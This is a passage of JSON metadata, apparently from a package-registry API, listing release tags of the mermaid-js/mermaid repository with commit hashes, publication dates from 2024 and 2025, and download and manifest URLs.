tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid